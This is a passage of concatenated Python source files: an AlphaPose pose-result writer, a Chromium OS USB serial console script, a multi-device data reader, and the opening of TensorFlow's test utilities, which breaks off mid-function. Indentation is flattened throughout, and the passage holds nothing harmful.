self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.opt.face:
from alphapose.face.prnet import PRN
face_3d_model = PRN(self.opt.device)
if self.save_video:
            # initialize the file video stream and adapt the output video resolution to the original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
        # keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
### jiasong update 2.24
if self.opt.face:
result = face_process(face_3d_model, result, orig_img)
###
### jiasong update 5.7
if self.opt.hand:
result = handDetect(result, orig_img)
###
result = {
'imgname': im_name,
'result': result
}
# print(result)
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
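# Illustrative usage sketch (not part of the original file). `cfg` and `opt` are
# assumed to come from AlphaPose's config/argument parsing, and `detections` is a
# hypothetical iterable of per-frame detection tuples:
#
#   writer = DataWriter(cfg, opt, save_video=False).start()
#   for (boxes, scores, ids, hm, cropped_boxes, orig_img, im_name) in detections:
#       writer.save(boxes, scores, ids, hm, cropped_boxes, orig_img, im_name)
#   writer.stop()               # flushes the queue and joins the worker
#   results = writer.results()  # accumulated per-frame pose results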
|
console.py
|
#!/usr/bin/env python
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Ignore indention messages, since legacy scripts use 2 spaces instead of 4.
# pylint: disable=bad-indentation,docstring-section-indent
# pylint: disable=docstring-trailing-quotes
"""Allow creation of uart/console interface via usb google serial endpoint."""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import argparse
import array
import os
import sys
import termios
import threading
import time
import traceback
import tty
try:
import usb
except:
print("import usb failed")
print("try running these commands:")
print(" sudo apt-get install python-pip")
print(" sudo pip install --pre pyusb")
print()
sys.exit(-1)
import six
def GetBuffer(stream):
if six.PY3:
return stream.buffer
return stream
"""Class Susb covers USB device discovery and initialization.
It can find a particular endpoint by vid:pid, serial number,
and interface number.
"""
class SusbError(Exception):
"""Class for exceptions of Susb."""
def __init__(self, msg, value=0):
"""SusbError constructor.
Args:
msg: string, message describing error in detail
value: integer, value of error when non-zero status returned. Default=0
"""
super(SusbError, self).__init__(msg, value)
self.msg = msg
self.value = value
class Susb():
"""Provide USB functionality.
Instance Variables:
_read_ep: pyUSB read endpoint for this interface
_write_ep: pyUSB write endpoint for this interface
"""
READ_ENDPOINT = 0x81
WRITE_ENDPOINT = 0x1
TIMEOUT_MS = 100
def __init__(self, vendor=0x18d1,
product=0x500f, interface=1, serialname=None):
"""Susb constructor.
Discovers and connects to USB endpoints.
Args:
vendor : usb vendor id of device
product : usb product id of device
interface : interface number ( 1 - 8 ) of device to use
serialname: string of device serialnumber.
Raises:
SusbError: An error accessing Susb object
"""
# Find the device.
dev_g = usb.core.find(idVendor=vendor, idProduct=product, find_all=True)
dev_list = list(dev_g)
    if not dev_list:
raise SusbError("USB device not found")
# Check if we have multiple devices.
dev = None
if serialname:
for d in dev_list:
dev_serial = "PyUSB doesn't have a stable interface"
try:
dev_serial = usb.util.get_string(d, 256, d.iSerialNumber)
except:
dev_serial = usb.util.get_string(d, d.iSerialNumber)
if dev_serial == serialname:
dev = d
break
if dev is None:
raise SusbError("USB device(%s) not found" % (serialname,))
else:
try:
dev = dev_list[0]
except:
try:
dev = dev_list.next()
except:
raise SusbError("USB device %04x:%04x not found" % (vendor, product))
# If we can't set configuration, it's already been set.
try:
dev.set_configuration()
except usb.core.USBError:
pass
# Get an endpoint instance.
cfg = dev.get_active_configuration()
intf = usb.util.find_descriptor(cfg, bInterfaceNumber=interface)
self._intf = intf
if not intf:
raise SusbError("Interface not found")
# Detach raiden.ko if it is loaded.
if dev.is_kernel_driver_active(intf.bInterfaceNumber) is True:
dev.detach_kernel_driver(intf.bInterfaceNumber)
read_ep_number = intf.bInterfaceNumber + self.READ_ENDPOINT
read_ep = usb.util.find_descriptor(intf, bEndpointAddress=read_ep_number)
self._read_ep = read_ep
write_ep_number = intf.bInterfaceNumber + self.WRITE_ENDPOINT
write_ep = usb.util.find_descriptor(intf, bEndpointAddress=write_ep_number)
self._write_ep = write_ep
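# Illustrative usage (not from the original file): open interface 0 of the
# default console device and poll its read endpoint once.
#
#   susb = Susb(vendor=0x18d1, product=0x501c, interface=0)
#   data = susb._read_ep.read(64, susb.TIMEOUT_MS)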
"""Suart class implements a stream interface, to access Google's USB class.
This creates a send and receive thread that monitors USB and console input
and forwards them across. This particular class is hardcoded to stdin/out.
"""
class SuartError(Exception):
"""Class for exceptions of Suart."""
def __init__(self, msg, value=0):
"""SuartError constructor.
Args:
msg: string, message describing error in detail
value: integer, value of error when non-zero status returned. Default=0
"""
super(SuartError, self).__init__(msg, value)
self.msg = msg
self.value = value
class Suart():
"""Provide interface to serial usb endpoint."""
def __init__(self, vendor=0x18d1, product=0x501c, interface=0,
serialname=None):
"""Suart contstructor.
Initializes USB stream interface.
Args:
vendor: usb vendor id of device
product: usb product id of device
interface: interface number of device to use
serialname: Defaults to None.
Raises:
SuartError: If init fails
"""
self._done = threading.Event()
self._susb = Susb(vendor=vendor, product=product,
interface=interface, serialname=serialname)
def wait_until_done(self, timeout=None):
return self._done.wait(timeout=timeout)
def run_rx_thread(self):
try:
while True:
try:
r = self._susb._read_ep.read(64, self._susb.TIMEOUT_MS)
if r:
GetBuffer(sys.stdout).write(r.tostring())
GetBuffer(sys.stdout).flush()
except Exception as e:
# If we miss some characters on pty disconnect, that's fine.
# ep.read() also throws USBError on timeout, which we discard.
if not isinstance(e, (OSError, usb.core.USBError)):
print("rx %s" % e)
finally:
self._done.set()
def run_tx_thread(self):
try:
while True:
try:
r = GetBuffer(sys.stdin).read(1)
if not r or r == b"\x03":
break
if r:
self._susb._write_ep.write(array.array('B', r),
self._susb.TIMEOUT_MS)
except Exception as e:
print("tx %s" % e)
finally:
self._done.set()
def run(self):
"""Creates pthreads to poll USB & PTY for data.
"""
self._exit = False
self._rx_thread = threading.Thread(target=self.run_rx_thread)
self._rx_thread.daemon = True
self._rx_thread.start()
self._tx_thread = threading.Thread(target=self.run_tx_thread)
self._tx_thread.daemon = True
self._tx_thread.start()
"""Command line functionality
Allows specifying vid:pid, serialnumber, interface.
Ctrl-C exits.
"""
parser = argparse.ArgumentParser(description="Open a console to a USB device")
parser.add_argument('-d', '--device', type=str,
help="vid:pid of target device", default="18d1:501c")
parser.add_argument('-i', '--interface', type=int,
help="interface number of console", default=0)
parser.add_argument('-s', '--serialno', type=str,
help="serial number of device", default="")
parser.add_argument('-S', '--notty-exit-sleep', type=float, default=0.2,
help="When stdin is *not* a TTY, wait this many seconds after EOF from "
"stdin before exiting, to give time for receiving a reply from the USB "
"device.")
def runconsole():
"""Run the usb console code
Starts the pty thread, and idles until a ^C is caught.
"""
args = parser.parse_args()
vidstr, pidstr = args.device.split(':')
vid = int(vidstr, 16)
pid = int(pidstr, 16)
serialno = args.serialno
interface = args.interface
sobj = Suart(vendor=vid, product=pid, interface=interface,
serialname=serialno)
if sys.stdin.isatty():
tty.setraw(sys.stdin.fileno())
sobj.run()
sobj.wait_until_done()
if not sys.stdin.isatty() and args.notty_exit_sleep > 0:
time.sleep(args.notty_exit_sleep)
def main():
stdin_isatty = sys.stdin.isatty()
if stdin_isatty:
fd = sys.stdin.fileno()
os.system("stty -echo")
old_settings = termios.tcgetattr(fd)
try:
runconsole()
finally:
if stdin_isatty:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
os.system("stty echo")
# Avoid having the user's shell prompt start mid-line after the final output
# from this program.
print()
if __name__ == '__main__':
main()
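# Example invocation (flags as defined by the parser above; values are
# illustrative):
#
#   python console.py -d 18d1:501c -i 0 -s MYSERIAL
#
# With stdin on a TTY the terminal is put in raw mode, so Ctrl-C arrives as
# 0x03, stops the tx thread and ends the session.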
|
reader.py
|
from . import gpu_dev_count, cpu_dev_count
try:
import queue as Queue
except ImportError:
import Queue
from threading import Thread
dev_count = gpu_dev_count if gpu_dev_count > 0 else cpu_dev_count
def yield_pieces(data, distribute_strategy, batch_size):
"""
Args:
distribute_strategy: support s=split, c=copy, u=unstack,
"""
    assert batch_size % dev_count == 0, "batch_size must be an integer multiple of dev_count."
# print('data in yield pieces')
# print(len(data))
assert type(data) == type(distribute_strategy), [type(data), type(distribute_strategy)]
assert len(data) == len(distribute_strategy), [len(data), len(distribute_strategy)]
if isinstance(data, dict):
keys = list(data.keys())
data_list = [data[i] for i in keys]
ds_list = [distribute_strategy[i] for i in keys]
else:
        assert isinstance(data, list), "the input data must be a list or dict containing multiple tensors."
data_list = data
ds_list = distribute_strategy
stride = batch_size // dev_count
p = stride
# while p < len(data_list) + stride:
while p <= batch_size:
temp = []
for d, s in zip(data_list, ds_list):
s = s.strip().lower()
if s == 's' or s == 'split':
if p - stride >= len(d):
# print('WARNING: no more examples to feed empty devices')
temp = []
return
temp.append(d[p-stride:p])
elif s == 'u' or s == 'unstack':
assert len(d) <= dev_count, 'Tensor size on dim 0 must be less equal to dev_count when unstack is applied.'
if p//stride > len(d):
# print('WARNING: no more examples to feed empty devices')
return
temp.append(d[p//stride-1])
elif s == 'c' or s == 'copy':
temp.append(d)
else:
raise NotImplementedError()
p += stride
if type(data) == dict:
yield dict(zip(*[keys, temp]))
else:
# print('yielded pieces')
# print(len(temp))
yield temp
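# Worked example (assuming dev_count == 2): with batch_size == 4,
#   yield_pieces({'x': [1, 2, 3, 4], 'y': 7}, {'x': 's', 'y': 'c'}, 4)
# yields two device-sized pieces:
#   {'x': [1, 2], 'y': 7}   # 'x' is split across devices, 'y' is copied
#   {'x': [3, 4], 'y': 7}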
def data_feeder(reader, postprocess_fn=None, prefetch_steps=2, phase='train', is_multi=False):
if postprocess_fn is None:
def postprocess_fn(batch, id=-1, phase='train', is_multi=False):
return batch
def worker(reader, dev_count, queue):
dev_batches = []
for index, data in enumerate(reader()):
if len(dev_batches) < dev_count:
dev_batches.append(data)
if len(dev_batches) == dev_count:
queue.put((dev_batches, 0))
dev_batches = []
        # For prediction, pad the remaining batches up to the number of
        # devices; the padded samples are removed from the prediction
        # outputs afterwards.
if len(dev_batches) > 0:
num_pad = dev_count - len(dev_batches)
for i in range(len(dev_batches), dev_count):
dev_batches.append(dev_batches[-1])
queue.put((dev_batches, num_pad))
queue.put(None)
queue = Queue.Queue(dev_count*prefetch_steps)
p = Thread(
target=worker, args=(reader, dev_count, queue))
p.daemon = True
p.start()
while True:
ret = queue.get()
queue.task_done()
if ret is not None:
batches, num_pad = ret
if dev_count > 1 and phase == 'train' and is_multi:
id = batches[0]['__task_id'][0]
else:
id = -1
batch_buf = []
flag_buf = []
for idx, batch in enumerate(batches):
# flag = num_pad == 0
flag = idx-len(batches) < -num_pad
# if num_pad > 0:
# num_pad -= 1
batch = postprocess_fn(batch, id, phase, is_multi=is_multi)
# batch = postprocess_fn(batch)
batch_buf.append(batch)
flag_buf.append(flag)
yield batch_buf, flag_buf
else:
break
queue.join()
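# Illustrative sketch (assuming dev_count == 1 and the package-level imports
# above): data_feeder prefetches batches from `reader` on a background thread
# and yields (batch_list, flag_list); a False flag marks a batch that was only
# duplicated to fill the remaining devices and whose outputs should be dropped.
#
#   def toy_reader():
#       for i in range(3):
#           yield {'x': [i]}
#
#   for batches, flags in data_feeder(toy_reader, phase='predict'):
#       pass  # len(batches) == dev_count on every step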
def decode_fake(nums, mask, bs):
bs //= dev_count
n_t = 0
for flag in mask:
if not flag:
break
n_t = n_t + 1
n_f = len(mask) - n_t
p1 = nums - (n_t-1) * bs
assert p1 % (n_f+1) == 0
each_f = p1 // (n_f+1)
return each_f * n_f
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import unittest
from absl.testing import parameterized
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top
except:
pass
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return pywrap_tensorflow.IsBuiltWithROCm()
def GpuSupportsHalfMatMulAndConv():
return pywrap_tensorflow.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
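# Illustrative usage (not from the original file): run the decorated test only
# when XLA is enabled, skipping it otherwise.
#
#   @skip_if(lambda: not is_xla_enabled())
#   def testRequiresXla(self):
#     ...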
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
